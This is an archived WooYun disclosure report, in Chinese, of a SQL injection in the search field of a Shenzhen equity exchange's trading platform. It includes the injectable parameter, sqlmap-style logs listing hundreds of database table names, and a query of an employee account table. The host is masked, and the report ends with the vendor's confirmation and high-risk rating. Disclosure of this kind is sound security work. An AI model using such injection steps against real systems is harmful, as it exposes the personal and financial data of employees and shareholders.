乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-10-28: 细节已通知厂商并且等待厂商处理中 2015-11-02: 厂商已经确认,细节仅向厂商公开 2015-11-12: 细节向核心白帽子及相关领域专家公开 2015-11-22: 细节向普通白帽子公开 2015-12-02: 细节向实习白帽子公开 2015-12-17: 细节向公众公开
用某人的话说就是“涉及近500亿元”
https://**.**.**.**/node/stock-market/plaza/sell
http://**.**.**.**/bugs/wooyun-2010-0139659这里看到主站一处注入的account表再次躺枪前海股权交易中心的交易平台,搜索处存在sql注入,抓包抓下来
https://**.**.**.**/node/stock-market/plaza/sell?ent_name=123
当前库300多张表
back-end DBMS: MySQL 5.0.11select count(*) from account: '464'select * from account limit 0,1: '序号, 邮箱, 部门, 职务/职责, 姓名, 联系电话, 座机, 当前状态, 工号, 邮箱'
第一张account存储了400多个员工的详细信息,包括姓名、职位、工号等等剩下的表信息巨大比如qhee_ent_apply_listed_stock_holder,存有1万8千条股权持有信息,包括姓名、股权信息啊等等还有其他的用户账号、交易详情等等,信息巨大
[11:07:12] [INFO] resumed: qhee_activity_mutiladdress[11:07:12] [INFO] resumed: qhee_activity_speecher[11:07:12] [INFO] resumed: qhee_admin_log[11:07:12] [INFO] resumed: qhee_admin_permission[11:07:12] [INFO] resumed: qhee_admin_power[11:07:12] [INFO] resumed: qhee_admin_roles[11:07:12] [INFO] resumed: qhee_admin_user_role_relations[11:07:12] [INFO] resumed: qhee_api_logs[11:07:12] [INFO] resumed: qhee_article_tag_map[11:07:12] [INFO] resumed: qhee_buzz_statistics[11:07:12] [INFO] resumed: qhee_cert_info[11:07:12] [INFO] resumed: qhee_code_equity[11:07:12] [INFO] resumed: qhee_code_equity_copy_0823[11:07:12] [INFO] resumed: qhee_code_equity_copy_0930[11:07:12] [INFO] resumed: qhee_com_custom[11:07:12] [INFO] resumed: qhee_com_dljz_base[11:07:13] [INFO] resumed: qhee_com_employee[11:07:13] [INFO] resumed: qhee_com_gszc_base[11:07:13] [INFO] resumed: qhee_com_gszc_stock_holder[11:07:13] [INFO] resumed: qhee_com_order[11:07:13] [INFO] resumed: qhee_com_pack_product[11:07:13] [INFO] resumed: qhee_com_product[11:07:13] [INFO] resumed: qhee_com_services[11:07:13] [INFO] resumed: qhee_common_comment[11:07:13] [INFO] resumed: qhee_cooperation_invest_org[11:07:13] [INFO] resumed: qhee_demand_products[11:07:13] [INFO] resumed: qhee_ent[11:07:13] [INFO] resumed: qhee_ent_apply_deposit_base[11:07:13] [INFO] resumed: qhee_ent_apply_deposit_block[11:07:13] [INFO] resumed: qhee_ent_apply_deposit_files[11:07:13] [INFO] resumed: qhee_ent_apply_deposit_files_back[11:07:13] [INFO] resumed: qhee_ent_apply_deposit_financial[11:07:13] [INFO] resumed: qhee_ent_apply_deposit_holder[11:07:13] [INFO] resumed: qhee_ent_apply_deposit_init[11:07:13] [INFO] resumed: qhee_ent_apply_deposit_more_block[11:07:13] [INFO] resumed: qhee_ent_apply_deposit_more_pledge[11:07:13] [INFO] resumed: qhee_ent_apply_deposit_person_manage[11:07:13] [INFO] resumed: qhee_ent_apply_deposit_pledge[11:07:13] [INFO] resumed: qhee_ent_apply_files_back[11:07:13] [INFO] resumed: qhee_ent_apply_history[11:07:13] [INFO] resumed: qhee_ent_apply_listed_base[11:07:13] [INFO] resumed: qhee_ent_apply_listed_base_20150604[11:07:13] [INFO] resumed: qhee_ent_apply_listed_base_20150608[11:07:13] [INFO] resumed: qhee_ent_apply_listed_base_20151028[11:07:13] [INFO] resumed: qhee_ent_apply_listed_base_bak20140717[11:07:13] [INFO] resumed: qhee_ent_apply_listed_base_tnp[11:07:13] [INFO] resumed: qhee_ent_apply_listed_display[11:07:13] [INFO] resumed: qhee_ent_apply_listed_files[11:07:13] [INFO] resumed: qhee_ent_apply_listed_files_tmp[11:07:13] [INFO] resumed: qhee_ent_apply_listed_financial[11:07:13] [INFO] resumed: qhee_ent_apply_listed_financial_tmp[11:07:13] [INFO] resumed: qhee_ent_apply_listed_init[11:07:13] [INFO] resumed: qhee_ent_apply_listed_stat[11:07:13] [INFO] resumed: qhee_ent_apply_listed_stock[11:07:13] [INFO] resumed: qhee_ent_apply_listed_stock_holder[11:07:13] [INFO] resumed: qhee_ent_apply_listed_stock_holder_20140821[11:07:13] [INFO] resumed: qhee_ent_apply_listed_stock_holder_tmp[11:07:13] [INFO] resumed: qhee_ent_apply_register_101b[11:07:13] [INFO] resuming partial value: qhee_ent_apply_[11:16:40] [INFO] retrieved: qhee_ent_call_api_history[11:26:23] [INFO] retrieved: qhee_ent_disseminates[11:33:37] [INFO] retrieved: qhee_ent_disseminates_20141021[11:40:24] [INFO] retrieved: qhee_ent_disseminates_20150522[11:45:41] [INFO] retrieved: qhee_ent_disseminates_201505221249[11:50:52] [INFO] retrieved: qhee_ent_edit_reject_history[12:02:15] [INFO] retrieved: qhee_ent[12:03:39] [ERROR] invalid character detected. retrying..[12:03:39] [WARNING] increasing time delay to 4 seconds_edit_verify_status[12:14:02] [INFO] retrieved: qhee_ent_edit_verify_status_20150918[12:21:39] [INFO] retrieved: qhee_ent_edit_verify_status_copy_0820[12:30:03] [INFO] retrieved: qhee_ent_final[12:33:49] [INFO] retrieved: qhee_ent_final_20140821[12:40:11] [INFO] retrieved: qhee_ent_final_2014_0923[12:45:02] [INFO] retrieved: qhee_ent_final_20150604[12:49:53] [INFO] retrieved: qhee_ent_final_20150608[12:53:04] [INFO] retrieved: qhee_ent_final_20150609[12:56:05] [INFO] retrieved: qhee_ent_final_copy_20140114[13:04:40] [INFO] retrieved: qhee_ent_news[13:08:03] [INFO] retrieved: qhee_ent_option_state[13:15:59] [INFO] retrieved: qhee_ent_patent[13:20:31] [INFO] retrieved: qhee_ent_patent_20
过滤
危害等级:高
漏洞Rank:10
确认时间:2015-11-02 10:13
非常感谢您的报告。报告中的问题已确认并复现.影响的数据:高攻击成本:低造成影响:高综合评级为:高,rank:10正在联系相关网站管理单位处置。
暂无